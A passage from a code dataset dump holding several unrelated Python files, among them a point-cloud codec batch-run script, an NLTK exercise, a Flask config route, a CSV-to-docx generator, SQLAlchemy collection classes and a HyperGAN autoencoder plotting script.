range(200,1000,1)\r\nnum_lst4 = range(1000,1700,1)\r\nnum_lst5 = range(1,7,1)\r\n\r\nfor name4 in num_lst1:\r\n\t\tford_01_file_lst.append( 'Ford_01_vox1mm-0' + str(name4))\r\nfor name5 in num_lst2:\r\n\t\tford_01_file_lst.append( 'Ford_01_vox1mm-' + str(name5))\r\n\t\t\r\nfor name4 in num_lst1:\r\n\t\tford_02_file_lst.append( 'Ford_02_vox1mm-0' + str(name4))\r\nfor name5 in num_lst2:\r\n\t\tford_02_file_lst.append( 'Ford_02_vox1mm-' + str(name5))\t\r\n\t\t\r\nfor name4 in num_lst3:\r\n\t\tford_03_file_lst.append( 'Ford_03_vox1mm-0' + str(name4))\r\nfor name5 in num_lst4:\r\n\t\tford_03_file_lst.append( 'Ford_03_vox1mm-' + str(name5))\t\r\n\t\t\t\r\nC1_num_lst = list([\r\n\t\t\t\t'r01',\r\n\t\t\t\t'r02',\r\n\t\t\t\t'r03',\r\n\t\t\t\t'r04',\r\n\t\t\t\t'r05',\r\n\t\t\t\t'r06',\r\n ])\r\n\t\t\r\nC2_num_lst = list([\r\n\t\t\t\t'r01',\r\n\t\t\t\t'r02',\r\n\t\t\t\t'r03',\r\n\t\t\t\t'r04',\r\n\t\t\t\t'r05',\r\n\t\t\t\t'r06',\r\n ])\r\n\t\t\r\nCW_num_lst = list([\r\n\t\t\t\t'r01',\r\n ])\r\n\t\t\r\nCY_num_lst = list([\r\n\t\t\t\t'r01',\r\n\t\t\t\t'r02',\r\n\t\t\t\t'r03',\r\n\t\t\t\t'r04',\r\n\t\t\t\t'r05',\r\n ])\r\n\t\t\r\noutput = open('runLog_2.txt', 'w')\r\noutputError = open('runDismatch_2.txt', 'w')\r\n\r\ndef getResolution(name2,num):\r\n\tpcerrorcfg = (cfgpath + cond + '\\\\' + name2 + '\\\\' + num + '\\\\pcerror.cfg')\r\n\treader = open( pcerrorcfg, 'r')\r\n\tResolution = 0\r\n\tfor line in reader:\r\n\t\twords = line.split()\r\n\t\tif ('resolution:' == words[0]):\r\n\t\t\tResolution = int(words[1])\r\n\t\t\tbreak\r\n\treturn str(Resolution)\r\n\r\ndef getPointCount(dec,declog,enclog):\r\n\tdecfile = open(dec,'r')\r\n\tvoxelnum = 0\r\n\tfor line in decfile:\r\n\t\twords = line.split()\r\n\t\tif words[0]=='element' and words[1]=='vertex':\r\n\t\t\tvoxelnum = words[2]\r\n\t\t\tbreak\r\n\tchangedeclog = open(enclog,'a')\r\n\tchangedeclog.write('\\nTotal point count: ' + voxelnum)\r\n\tchangedeclog = open(declog,'a')\r\n\tchangedeclog.write('\\nTotal point count: ' + 
voxelnum)\r\n\r\n#运行start\r\n\r\n#C1\r\ncond = 'lossless-geom-lossy-attrs'\r\nname1 = cond + '_'\r\nC1_lst = ford_01_file_lst + ford_02_file_lst + ford_03_file_lst\r\nfor name2 in C1_lst:\r\n\tfor num in C1_num_lst:\r\n\t\tname3 = ('_' + num)\r\n\t\tcodname = (name1 + name2 + name3)\r\n\t\tcfgname2 = ('f' + name2[1:8] + 'q1mm')\r\n\t\tencconfig =(cfgpath + cond + '\\\\' + cfgname2 + '\\\\' + num + '\\\\encoder.cfg')\r\n\t\tdecconfig =(cfgpath + cond + '\\\\' + cfgname2 + '\\\\' + num + '\\\\decoder.cfg')\r\n\t\tseq = (datasetpath + name2 + '.ply')\r\n\t\tenc = (name1 + name2 + name3 + '_enc.ply')\r\n\t\tdec = (name1 + name2 + name3 + '_dec.ply')\r\n\t\tbin = (name1 + name2 + name3 + '.bin')\r\n\t\tenclog = (logpath + name1 + name2 + name3 + '_enc.log')\r\n\t\tdeclog = (logpath + name1 + name2 + name3 + '_dec.log')\r\n\t\tpcelog = (logpath + name1 + name2 + name3 + '_pce.log')\r\n\t\tos.system(tmc3 + ' --config=' + encconfig + ' --uncompressedDataPath=' + seq + ' --reconstructedDataPath=' + dirpath + enc + ' --compressedStreamPath=' + dirpath + bin + ' >' + enclog) \r\n\t\tos.system(tmc3 + ' --config=' + decconfig + ' --uncompressedDataPath=' + seq + ' --reconstructedDataPath=' + dirpath + dec + ' --compressedStreamPath=' + dirpath + bin + ' >' + declog) \r\n\t\tos.system(pce + ' -a ' + seq + ' -b ' + dirpath + dec + ' -l 1 -d 1 -d 1 -r 30000 --nbThreads=10 --dropdups=2 --neighborsProc=1 >' + pcelog)\r\n\t\tgetPointCount(dec,declog,enclog)\t\t\r\n\t\tprint(codname + ' finish')\r\n\t\toutput.write(codname + ' finish\\n')\r\n\t\tsiez_enc = os.path.getsize(enc)\r\n\t\tsiez_dec = os.path.getsize(dec)\r\n\t\tif siez_enc != siez_dec:\r\n\t\t\toutputError.write(codname+'\\n')\r\n\t\tos.remove(enc)\r\n\t\tos.remove(dec)\r\n\t\tos.remove(bin)\r\n\r\n\t\t\r\n#C2\r\ncond = 'lossy-geom-lossy-attrs'\r\nname1 = cond + '_'\r\nC2_lst = list()\r\n#ford_01_file_lst + ford_02_file_lst + ford_03_file_lst\r\nfor name2 in C2_lst:\r\n\tfor num in C2_num_lst:\r\n\t\tname3 = ('_' + num) 
\r\n\t\tcodname = (name1 + name2 + name3)\r\n\t\tcfgname2 = ('f' + name2[1:8] + 'q1mm')\r\n\t\tencconfig =(cfgpath + cond + '\\\\' + cfgname2 + '\\\\' + num + '\\\\encoder.cfg')\r\n\t\tdecconfig =(cfgpath + cond + '\\\\' + cfgname2 + '\\\\' + num + '\\\\decoder.cfg')\r\n\t\tseq = (datasetpath + name2 + '.ply')\r\n\t\tenc = (name1 + name2 + name3 + '_enc.ply')\r\n\t\tdec = (name1 + name2 + name3 + '_dec.ply')\r\n\t\tbin = (name1 + name2 + name3 + '.bin')\r\n\t\tenclog = (logpath + name1 + name2 + name3 + '_enc.log')\r\n\t\tdeclog = (logpath + name1 + name2 + name3 + '_dec.log')\r\n\t\tpcelog = (logpath + name1 + name2 + name3 + '_pce.log')\r\n\t\tos.system(tmc3 + ' --config=' + encconfig + ' --uncompressedDataPath=' + seq + ' --reconstructedDataPath=' + dirpath + enc + ' --compressedStreamPath=' + dirpath + bin + ' >' + enclog) \r\n\t\tos.system(tmc3 + ' --config=' + decconfig + ' --uncompressedDataPath=' + seq + ' --reconstructedDataPath=' + dirpath + dec + ' --compressedStreamPath=' + dirpath + bin + ' >' + declog) \r\n\t\tos.system(pce + ' -a ' + seq + ' -b ' + dirpath + dec + ' -n ' + seq + ' -l 1 -d 1 -d 1 -r 30000 --nbThreads=10 --dropdups=2 --neighborsProc=1 >' + pcelog)\r\n\t\tgetPointCount(dec,declog,enclog)\t\t\r\n\t\tprint(codname + ' finish')\r\n\t\toutput.write(codname + ' finish\\n')\r\n\t\tsiez_enc = os.path.getsize(enc)\r\n\t\tsiez_dec = os.path.getsize(dec)\r\n\t\tif siez_enc != siez_dec:\r\n\t\t\toutputError.write(codname+'\\n')\r\n\t\tos.remove(enc)\r\n\t\tos.remove(dec)\r\n\t\tos.remove(bin)\r\n\r\n#CW\t\t\r\ncond = 'lossless-geom-lossless-attrs'\r\nname1 = cond + '_'\r\nCW_lst = list()\r\n#ford_01_file_lst + ford_02_file_lst + ford_03_file_lst\r\nfor name2 in CW_lst:\r\n\tfor num in CW_num_lst:\r\n\t\tname3 = ('_' + num) \r\n\t\tcodname = (name1 + name2 + name3)\r\n\t\tcfgname2 = ('f' + name2[1:8] + 'q1mm')\r\n\t\tencconfig =(cfgpath + cond + '\\\\' + cfgname2 + '\\\\encoder.cfg')\r\n\t\tdecconfig =(cfgpath + cond + '\\\\' + cfgname2 + 
'\\\\decoder.cfg')\r\n\t\tseq = (datasetpath + name2 + '.ply')\r\n\t\tenc = (name1 + name2 + name3 + '_enc.ply')\r\n\t\tdec = (name1 + name2 + name3 + '_dec.ply')\r\n\t\tbin = (name1 + name2 + name3 + '.bin')\r\n\t\tenclog = (logpath + name1 + name2 + name3 + '_enc.log')\r\n\t\tdeclog = (logpath + name1 + name2 + name3 + '_dec.log')\r\n\t\tos.system(tmc3 + ' --config=' + encconfig + ' --uncompressedDataPath=' + seq + ' --reconstructedDataPath=' + dirpath + enc + ' --compressedStreamPath=' + dirpath + bin + ' >' + enclog) \r\n\t\tos.system(tmc3 + ' --config=' + decconfig + ' --uncompressedDataPath=' + seq + ' --reconstructedDataPath=' + dirpath + dec + ' --compressedStreamPath=' + dirpath + bin + ' >' + declog) \r\n\t\tgetPointCount(dec,declog,enclog)\r\n\t\tprint(codname + ' finish')\r\n\t\toutput.write(codname + ' finish\\n')\r\n\t\tsiez_enc = os.path.getsize(enc)\r\n\t\tsiez_dec = os.path.getsize(dec)\r\n\t\tif siez_enc != siez_dec:\r\n\t\t\toutputError.write(codname+'\\n')\r\n\t\tos.remove(enc)\r\n\t\tos.remove(dec)\r\n\t\tos.remove(bin)\r\n\r\n#CY\t\t\r\ncond = 'lossless-geom-nearlossless-attrs'\r\nname1 = cond + '_'\r\nCY_lst = list()\r\n#ford_01_file_lst + ford_02_file_lst + ford_03_file_lst\r\nfor name2 in CY_lst:\r\n\tfor num in CY_num_lst:\r\n\t\tname3 = ('_' + num) \r\n\t\tcodname = (name1 + name2 + name3)\r\n\t\tcfgname2 = ('f' + name2[1:8] + 'q1mm')\r\n\t\tencconfig =(cfgpath + cond + '\\\\' + cfgname2 + '\\\\' + num + '\\\\encoder.cfg')\r\n\t\tdecconfig =(cfgpath + cond + '\\\\' + cfgname2 + '\\\\' + num + '\\\\decoder.cfg')\r\n\t\tseq = (datasetpath + name2 + '.ply')\r\n\t\tenc = (name1 + name2 + name3 + '_enc.ply')\r\n\t\tdec = (name1 + name2 + name3 + '_dec.ply')\r\n\t\tbin = (name1 + name2 + name3 + '.bin')\r\n\t\tenclog = (logpath + name1 + name2 + name3 + '_enc.log')\r\n\t\tdeclog = (logpath + name1 + name2 + name3 + '_dec.log')\r\n\t\tpcelog = (logpath + name1 + name2 + name3 + '_pce.log')\r\n\t\tos.system(tmc3 + ' --config=' + encconfig + ' 
--uncompressedDataPath=' + seq + ' --reconstructedDataPath=' + dirpath + enc + ' --compressedStreamPath=' + dirpath + bin + ' >' + enclog) \r\n\t\tos.system(tmc3 + ' --config=' + decconfig + ' --uncompressedDataPath=' + seq + ' --reconstructedDataPath=' + dirpath + dec + ' --compressedStreamPath=' + dirpath + bin + ' >' + declog) \r\n\t\tos.system(pce + ' -a ' + seq + ' -b ' + dirpath + dec + ' -l 1 -d 1 -d 1 -r 30000 --nbThreads=10 --dropdups=2 --neighborsProc=1 >' + pcelog)\r\n\t\tgetPointCount(dec,declog,enclog)\r\n\t\tprint(codname + ' finish')\r\n\t\toutput.write(codname + ' finish\\n')\r\n\t\tsiez_enc = os.path.getsize(enc)\r\n\t\tsiez_dec = os.path.getsize(dec)\r\n\t\tif siez_enc != siez_dec:\r\n\t\t\toutputError.write(codname+'\\n')\r\n\t\tos.remove(enc)\r\n\t\tos.remove(dec)\r\n\t\tos.remove(bin)\r\n\r\n#运行end\r\noutputError.close()\r\n\r\n\r\n\t\t\t\r\n\r\n\t\t\r\n","sub_path":"run_f2.py","file_name":"run_f2.py","file_ext":"py","file_size_in_byte":9997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"12179621","text":"import nltk, re, pprint\n# from nltk import work_tokenize # unclear if necessary\n# READ FILE\ndef open_file_and_get_text(filename):\n with open(filename,'r') as our_file:\n text = our_file.read()\n return text # takes the file, reads it. stores it as a string\n\nour_file = \"walden.txt\"\ntext = open_file_and_get_text(our_file)\nw_words = nltk.word_tokenize(text)\n\n\na_words = text.concordance(\"bottom\")\nb_words = w_words.concordance(\"bottom\")\n\n\n# w_words is now a list\nprint(\"These are words\")\nprint(w_words[0:30]) # prints first 29 items in List\nnltk_walden_text = nltk.Text(w_words)\nprint(nltk_walden_text.concordance(\"the\"))\n\n# TOKENIZE file\n\n# FORM SENTENCES - group tokens into list of sentence strings\n\n# SUB SELECT - form a list of sentences incl. 
\"word-x\"\n\n# DISPLAYER - increment through the subselect, on sentence at a Time\n","sub_path":"nltk-learn/SlowReader-deprecated.py","file_name":"SlowReader-deprecated.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"18406533","text":"import pickle\nimport glob\n\ndef get_best_model(name_pattern):\n f=glob.glob(name_pattern)\n fepoch = [int(i_f.split('-')[-2]) for i_f in f]\n pattern_rep = name_pattern.replace(\"*-*.h5\", \"{:02}-*.h5\").format(max(fepoch))\n model_weight = glob.glob(pattern_rep)[0]\n\n max_epoch = max(fepoch)\n max_auc = float(model_weight[:model_weight.find('.h5')].split('-')[-1])\n\n print(\"...... LOADED MODEL: %s\" % model_weight)\n\n return model_weight, max_epoch, max_auc\n\ndef save_roc_app(fpr, tpr, threshold, val_ep_auc):\n file_fpr=open('file_fpr','w')\n pickle.dump(fpr, file_fpr)\n file_fpr.close()\n\n file_tpr=open('file_tpr','w')\n pickle.dump(tpr, file_tpr)\n file_tpr.close()\n\n file_threshold=open('file_threshold','w')\n pickle.dump(threshold, file_threshold)\n file_threshold.close()\n\n val_info = val_ep_auc \n file_val=open('file_val','w')\n pickle.dump(val_info, file_val)\n file_val.close()\n","sub_path":"my_prediction/auto_pred.py","file_name":"auto_pred.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"469068720","text":"from flask_restful import Resource, abort\nfrom flask import request, redirect, url_for, render_template, make_response\nfrom strategies import config as strategy_config\n\nfrom model import config_builder as cb\nimport config\nfrom controller import strategy_config_store as scs\nfrom controller import experiment_store as es\n\n\nclass AddAssembleConfig(Resource):\n @staticmethod\n def post(hash, copy_id=None, edit_id=None):\n try:\n if not request.form:\n abort(403, message='missing form')\n\n 
assemble_config_list = cb.generate_assemble_configs(form_data=request.form)\n success = es.add_config_list(hash, edit_id, assemble_config_list, True)\n if success:\n return redirect(url_for('manage_experiment', hash=hash))\n\n abort(403, message=\"Couldn't save to elastic\")\n\n except Exception as e:\n if config.debug_mode:\n abort(400, message=str(e))\n\n else:\n abort(400, message=\"something went wrong\")\n\n def get(self, hash, copy_id=None, edit_id=None):\n try:\n if copy_id or edit_id:\n config_data = scs.get_config_by_id(copy_id if copy_id else edit_id)\n return self.make_response(\n \"edit\" if edit_id else \"copy\",\n config_data.shared_parameters.get('label', \"BUG\"),\n config_data,\n )\n\n return self.make_response(\"add\", \"BUG\")\n\n except Exception as e:\n if config.debug_mode:\n abort(400, message=str(e))\n\n else:\n abort(400, message=\"something went wrong\")\n\n @staticmethod\n def make_response(mode, default_label, config_data=False):\n return make_response(\n render_template(\n 'experiment/add_assembling_config_form.j2',\n title=\"Add Feature Assembling config\",\n default_label=default_label,\n strategies=strategy_config['assembler_strategies'],\n strategy_type=\"assembler_strategies\",\n mode=mode,\n config_data=config_data\n ),\n 200,\n {'Content-Type': 'text/html'}\n )\n","sub_path":"DWF-server/routes/experiment/add_assemble_config.py","file_name":"add_assemble_config.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"574456367","text":"# -*- coding: utf-8 -*-\r\n# coding: utf-8\r\nimport csv\r\nimport os\r\nimport docx\r\n\r\ndef csv_reader(file_obj):\r\n \"\"\"\r\n Read a csv file\r\n \"\"\"\r\n reader = csv.reader(file_obj)\r\n csv_read = [iters for iters in reader]\r\n date = []\r\n for iters in csv_read:\r\n for y in iters:\r\n a = y.replace('\"', '').split(';')\r\n date.append([a[16], a[17], a[19], a[18], a[20]])\r\n return date, 
len(date), len(date[0])\r\n\r\ndef record_docx(date, rows, cols, doc_file):\r\n doc = docx.Document()\r\n\r\n par = doc.add_paragraph()\r\n par.add_run('С инструктажем по технике безопасности ознакомлен, правила мне ясны. '\r\n 'Я понимаю возможные наступления последствий в виде травм'\r\n ' в связи с неисполнением ТБ и указаний гида/ экскурсовода/сотрудника «Центра путешественников» во время мероприятия__________________ дата____________\\n').bold=True\r\n\r\n # добавляем таблицу NxM\r\n table = doc.add_table(rows=rows, cols=cols+1)\r\n # применяем стиль для таблицы\r\n table.style = 'Table Grid'\r\n\r\n # заполняем таблицу данными\r\n for row in range(rows):\r\n for col in range(cols):\r\n # получаем ячейку таблицы\r\n cell = table.cell(row, col)\r\n # записываем в ячейку данные\r\n cell.text = date[row][col]\r\n\r\n cell = table.cell(0, cols)\r\n cell.text = 'Подпись'\r\n\r\n doc.save(doc_file)\r\n return 'ok'\r\n\r\n\r\nif __name__ == \"__main__\":\r\n csv_path = os.path.abspath(input('Введите назв��ние csv-файла:') + '.csv')\r\n doc_file = input('Введите название docx-файла на выходе:') + '.docx'\r\n doc_path = os.path.abspath(doc_file)\r\n with open(csv_path, \"r\", encoding='utf-8') as f_obj:\r\n date, rows, cols = csv_reader(f_obj)\r\n record_docx(date, rows, cols, doc_file)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"517027806","text":"from zope.security.checker import NamesChecker\n\nfrom sqlalchemy import orm\n\nimport interfaces\nimport relations\nimport soup\nimport types\n\nclass Tuple(object):\n def __init__(self):\n self.data = []\n\n @property\n def adapter(self):\n return orm.collections.collection_adapter(self)\n\n @orm.collections.collection.appender\n def _appender(self, item):\n self.data.append(item)\n \n @orm.collections.collection.iterator\n def _iterator(self):\n return iter(self.data)\n\n 
@orm.collections.collection.remover\n def _remover(self, item):\n self.data.remove(item)\n\n @orm.collections.collection.converter\n def convert(self, items):\n converted = []\n \n for item in items:\n if not interfaces.IMapped.providedBy(item):\n item = soup.persist(item)\n\n # set up relation\n relation = relations.OrderedRelation()\n relation.target = item\n relation.order = len(converted)\n\n converted.append(relation)\n \n return converted\n\n def __iter__(self):\n return (self[i] for i in range(len(self.data)))\n \n def __getitem__(self, index):\n obj = self.data[index].target\n if interfaces.IBasicType.providedBy(obj):\n return obj.value\n else:\n return obj\n \n def __setitem__(self, index, value):\n return TypeError(\"Object does not support item assignment.\")\n\n def __len__(self):\n return len(self.data)\n \n def __repr__(self):\n return repr(tuple(self))\n \nclass OrderedList(Tuple):\n __Security_checker__ = NamesChecker(\n ('append', 'count', 'extend', 'index', 'insert', 'pop', 'remove', 'reverse', 'sort'))\n\n @orm.collections.collection.appender\n def _appender(self, item):\n self.data.append(item)\n \n @orm.collections.collection.iterator\n def _iterator(self):\n return iter(self.data)\n\n @orm.collections.collection.remover\n def _remover(self, item):\n self.data.remove(item)\n\n @orm.collections.collection.internally_instrumented\n def append(self, item, _sa_initiator=None):\n if not interfaces.IMapped.providedBy(item):\n item = soup.persist(item)\n\n # set up relation\n relation = relations.OrderedRelation()\n relation.target = item\n relation.order = len(self.data)\n\n self.adapter.fire_append_event(relation, _sa_initiator)\n \n # add relation to internal list\n self.data.append(relation)\n\n @orm.collections.collection.internally_instrumented\n def remove(self, item, _sa_initiator=None):\n if interfaces.IMapped.providedBy(item):\n uuid = item.uuid\n else:\n uuid = item._d_uuid\n\n for relation in self.data:\n if relation.right == uuid:\n 
self.adapter.fire_remove_event(relation, _sa_initiator)\n self.data.remove(relation)\n break\n else:\n raise ValueError(\"Not in list: %s\" % item)\n \n def extend(self, items):\n map(self.append, items)\n\n def count(self, value):\n return list(self).count(value)\n\n def index(self, value, **kwargs):\n for index in range(len(self)):\n if self[index] == value:\n return index\n\n raise ValueError(\"%s not found in list.\" % value)\n\n @orm.collections.collection.internally_instrumented\n def insert(self, index, item):\n stack = self.data[index:]\n del self.data[index:]\n self.append(item)\n for relation in stack:\n relation.order += 1\n self.data.append(relation)\n\n @orm.collections.collection.internally_instrumented\n def pop(self, index=-1, _sa_initiator=None):\n relation = self.data[index]\n obj = relation.target\n \n self.adapter.fire_remove_event(relation, _sa_initiator)\n del self.data[index]\n \n stack = self.data[index:]\n for relation in stack:\n relation.order -= 1\n\n return obj\n \n def reverse(self):\n self.data.reverse()\n for index in range(len(self.data)):\n self.data[index].order = index\n \n def sort(self, **kwargs):\n data = list(self)\n data_relation_mapping = zip(data, self.data)\n\n mapping = {}\n for item, relation in data_relation_mapping:\n relations = mapping.setdefault(item, [])\n relations.append(relation)\n\n data.sort(**kwargs)\n del self.data[:]\n \n for item in data:\n relation = mapping[item].pop()\n relation.order = len(self.data)\n self.data.append(relation) \n \n def __repr__(self):\n return repr(list(self))\n\n @orm.collections.collection.internally_instrumented\n def __setitem__(self, index, value, _sa_initiator=None):\n # remove previous\n relation = self.data[index]\n self.adapter.fire_remove_event(relation, _sa_initiator)\n\n # add new\n self.append(value)\n relation = self.data[-1]\n del self.data[-1]\n\n # replace previous\n relation.order = index\n self.data[index] = relation\n\nclass Dict(dict):\n __Security_checker__ = 
NamesChecker(\n ('clear', 'copy', 'fromkeys', 'get', 'has_key', 'items', 'iteritems', 'iterkeys', 'itervalues', 'keys', 'pop', 'popitem', 'setdefault', 'update', 'values'))\n\n @property\n def adapter(self):\n return orm.collections.collection_adapter(self)\n\n @orm.collections.collection.appender\n @orm.collections.collection.replaces(1) \n def _appender(self, item):\n dict.__setitem__(self, item.key, item)\n \n @orm.collections.collection.iterator\n def _iterator(self):\n return dict.itervalues(self)\n\n @orm.collections.collection.remover\n def _remover(self, item):\n dict.remove(item)\n\n @orm.collections.collection.internally_instrumented\n def __setitem__(self, key, item, _sa_initiator=None):\n if not interfaces.IMapped.providedBy(item):\n item = soup.persist(item)\n\n # mapped objects may be used as key; internally, we'll use\n # the UUID in this case, however.\n if interfaces.IMapped.providedBy(key):\n key = key.uuid\n\n assert isinstance(key, types.StringTypes), \\\n \"Only strings or mapped objects may be used as keys.\"\n \n # set up relation\n relation = relations.KeyRelation()\n relation.target = item\n relation.key = key\n\n self.adapter.fire_append_event(relation, _sa_initiator)\n dict.__setitem__(self, key, relation)\n\n @orm.collections.collection.converter\n def convert(self, d):\n converted = []\n \n for key, item in d.items():\n if not interfaces.IMapped.providedBy(item):\n item = soup.persist(item)\n\n # set up relation\n relation = relations.KeyRelation()\n relation.target = item\n relation.key = key\n\n converted.append(relation)\n \n return converted\n\n def values(self):\n return [self[key] for key in self]\n\n def itervalues(self):\n return (self[key] for key in self)\n\n @orm.collections.collection.internally_instrumented\n def pop(self, key, _sa_initiator=None):\n relation = dict.pop(self, key)\n obj = relation.target\n \n self.adapter.fire_remove_event(relation, _sa_initiator)\n\n if interfaces.IBasicType.providedBy(obj):\n return 
obj.value\n else:\n return obj\n\n @orm.collections.collection.internally_instrumented\n def popitem(self, _sa_initiator=None):\n key, relation = dict.popitem(self)\n obj = relation.target\n\n self.adapter.fire_remove_event(relation, _sa_initiator)\n\n if interfaces.IBasicType.providedBy(obj):\n return key, obj.value\n else:\n return key, obj\n\n @orm.collections.collection.internally_instrumented\n def clear(self, _sa_initiator=None):\n for relation in dict.itervalues(self):\n self.adapter.fire_remove_event(relation, _sa_initiator) \n\n dict.clear(self)\n \n def __getitem__(self, key):\n # mapped objects may be used as key; internally, we'll use\n # the UUID in this case, however.\n if interfaces.IMapped.providedBy(key):\n key = key.uuid\n\n assert isinstance(key, types.StringTypes), \\\n \"Only strings or mapped objects may be used as keys.\"\n\n obj = dict.__getitem__(self, key).target\n if interfaces.IBasicType.providedBy(obj):\n return obj.value\n else:\n return obj\n\n def __repr__(self):\n return repr(dict(\n (key, self[key]) for key in self))\n","sub_path":"z3c.dobbin/trunk/src/z3c/dobbin/collections.py","file_name":"collections.py","file_ext":"py","file_size_in_byte":8917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"88601193","text":"import matplotlib\nmatplotlib.use('agg')\nimport os\nimport sys\nimport pprint\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import entropy\n\nimport torch\nimport torch.nn as nn\nfrom torch import optim\nfrom torch.nn import functional as F\nfrom torch.distributions.multivariate_normal import MultivariateNormal\n\nimport ops\nimport utils\n\n\ndef load_args():\n\n parser = argparse.ArgumentParser(description='param-wgan')\n parser.add_argument('--z', default=10, type=int, help='latent space width')\n parser.add_argument('--ze', default=64, type=int, help='encoder dimension')\n parser.add_argument('--batch_size', default=15, 
type=int)\n parser.add_argument('--epochs', default=200000, type=int)\n parser.add_argument('--dataset', default='gaussian', type=str)\n parser.add_argument('--save_dir', default='./', type=str)\n parser.add_argument('--nd', default=2, type=str)\n parser.add_argument('--beta', default=10, type=int)\n parser.add_argument('--l', default=10, type=int)\n parser.add_argument('--pretrain_e', default=True, type=bool)\n parser.add_argument('--exp', default='0', type=str)\n\n args = parser.parse_args()\n return args\n\ndef to_color_dk(y):\n if y == 0: return 'darkcyan'\n if y == 1: return 'darkmagenta'\n if y == 2: return 'darkgreen'\n if y == 3: return 'darkorange'\ndef to_color_lt(y):\n if y == 0: return 'cyan'\n if y == 1: return 'magenta'\n if y == 2: return 'green'\n if y == 3: return 'orange'\n\n\"\"\" sanity check standard NN \"\"\"\nclass Encoder(nn.Module):\n def __init__(self):\n super(NN, self).__init__()\n self.linear1 = nn.Linear(2, 100)\n self.linear2 = nn.Linear(100, 1)\n def forward(self, x):\n x = F.elu(self.linear1(x))\n return self.linear2(x)\n\nclass Decoder(nn.Module):\n def __init__(self):\n super(NN, self).__init__()\n self.linear1 = nn.Linear(1, 100)\n self.linear2 = nn.Linear(100, 2)\n def forward(self, x):\n x = F.elu(self.linear1(x))\n return self.linear2(x)\nclass AE(nn.Module):\n def __init__(self):\n super(NN, self).__init__()\n self.encoder = Encoder()\n self.decoder = Decoder()\n def forward(self, x):\n z = self.encoder(x)\n x = self.decoder(z)\n return x\n\n\n\"\"\" functional version of the actual target network \"\"\"\ndef eval_nn_f(data, layers):\n e1_w, e1_b, e2_w, e2_b, d1_w, d1_b, d2_w, d2_b = layers\n x = F.elu(F.linear(data, e1_w, bias=e1_b))\n x = F.linear(x, e2_w, bias=e2_b)\n x = F.elu(F.linear(x, d1_w, bias=d1_b))\n x = F.linear(x, d2_w, bias=d2_b)\n return x\n\n\n\"\"\" \ntrains hypergan target network,\nneeds to match above network architectures\n\"\"\"\ndef train_nn(args, Z, data, target):\n \"\"\" calc classifier loss on 
target architecture \"\"\"\n data, target = data.cuda(), target.cuda()\n target = target.view(-1)\n x = eval_nn_f(data, Z)\n\n loss = F.mse_loss(x, data)\n return loss\n\n\n\"\"\" \nbarebones plotting function\nplots class labels and thats it\n\"\"\"\ndef plot_data(x, y, title):\n plt.close('all')\n datas = [[], [], [], []]\n for (data, target) in zip(x, y):\n datas[target].append(np.array(data))\n plt.scatter(*zip(*datas[0]), alpha=.5, linewidth=.1, edgecolor='k', label='c1')\n plt.scatter(*zip(*datas[1]), alpha=.5, linewidth=.1, edgecolor='k', label='c2')\n plt.scatter(*zip(*datas[2]), alpha=.5, linewidth=.1, edgecolor='k', label='c3')\n plt.xlim(0, 10)\n plt.ylim(0, 10)\n #plt.legend(loc='best')\n plt.savefig('{}/{}'.format(args.save_dir, title))\n\n\n\"\"\" \nthis will plot data from the 4 clusters\ncurrently supports passing class data (x, y) and entropy - alpha\nsaves to some predefined folder\n\"\"\"\ndef plot_data_entropy(x, y, real, preds_all, title):\n plt.close('all')\n fig, ax = plt.subplots(4, 5, figsize=(15,15))\n plt.xlim(-5, 15)\n plt.ylim(-5, 15)\n plt.suptitle('HyperGAN Autoencoding')\n model = 0\n # plot 15 subplots, one for each network prediction\n for xsub in range(3):\n for ysub in range(5):\n preds = preds_all[model, :, :]\n ax[xsub, ysub].set_title('AE {}'.format(model))\n ax[xsub, ysub].set_ylim(-5, 15)\n ax[xsub, ysub].set_xlim(-5, 15)\n for (data, target) in zip(preds, y):\n data = data.cpu().numpy()\n ax[xsub, ysub].scatter(*data, c=to_color_lt(target))\n model += 1\n data_r, target_r = real\n for (data, target) in zip(data_r, target_r):\n data = data.cpu().numpy()\n ax[xsub, ysub].scatter(*data, c=to_color_dk(target), alpha=0.1)\n\n ax[3, 0].set_title('Average AE'.format(model))\n ax[3, 0].set_ylim(-5, 15)\n ax[3, 0].set_xlim(-5, 15) \n for (data, target) in zip(x, y):\n data = data.cpu().numpy()\n ax[3, 0].scatter(*data, c=to_color_lt(target))#, alpha=ent)\n x, y = real\n for (data, target) in zip(x, y):\n data = data.cpu().numpy()\n 
ax[3, 0].scatter(*data, c=to_color_dk(target), alpha=0.1)\n\n print ('saving to ', args.save_dir)\n plt.savefig(args.save_dir+'/{}'.format(title))\n\n\"\"\"\naggregates predicted classes for plotting \ncan be used for standard NN or for hypergan\nimplements hypergan target network as a functional \npasses whatever data to plotting\n\"\"\"\ndef get_points(mixer, hyperAE, iter, ae=None):\n E1, E2, D1, D2 = hyperAE\n points, targets, ents, probs = [], [], [], []\n data, t = create_data(n=50)\n z = torch.randn(args.batch_size, args.ze).cuda()\n codes = mixer(z)\n l1w, l1b = E1(codes[0], training=False)\n l2w, l2b = E2(codes[1], training=False)\n l3w, l3b = D1(codes[2], training=False)\n l4w, l4b = D2(codes[3], training=False)\n layers_all = [l1w, l1b, l2w, l2b, l3w, l3b, l4w, l4b]\n preds_all = torch.zeros((15, 150, 2))\n for i, p in enumerate(data):\n preds = []\n for (layers) in zip(*layers_all):\n if ae is not None:\n x = ae(p)\n else:\n x = eval_nn_f(p, layers)\n preds.append(x)\n preds_all[:, i, :] = x\n points.append(p)\n #ents.append(entropy(F.softmax(torch.stack(preds), dim=1).mean(0).cpu().numpy().T))\n x = preds_all.mean(0)\n plot_data_entropy(x, t, (data, t), preds_all, 'gaussian_{}'.format(iter))\n \n\n\"\"\" permutes a data and label tensor with the same permutation matrix 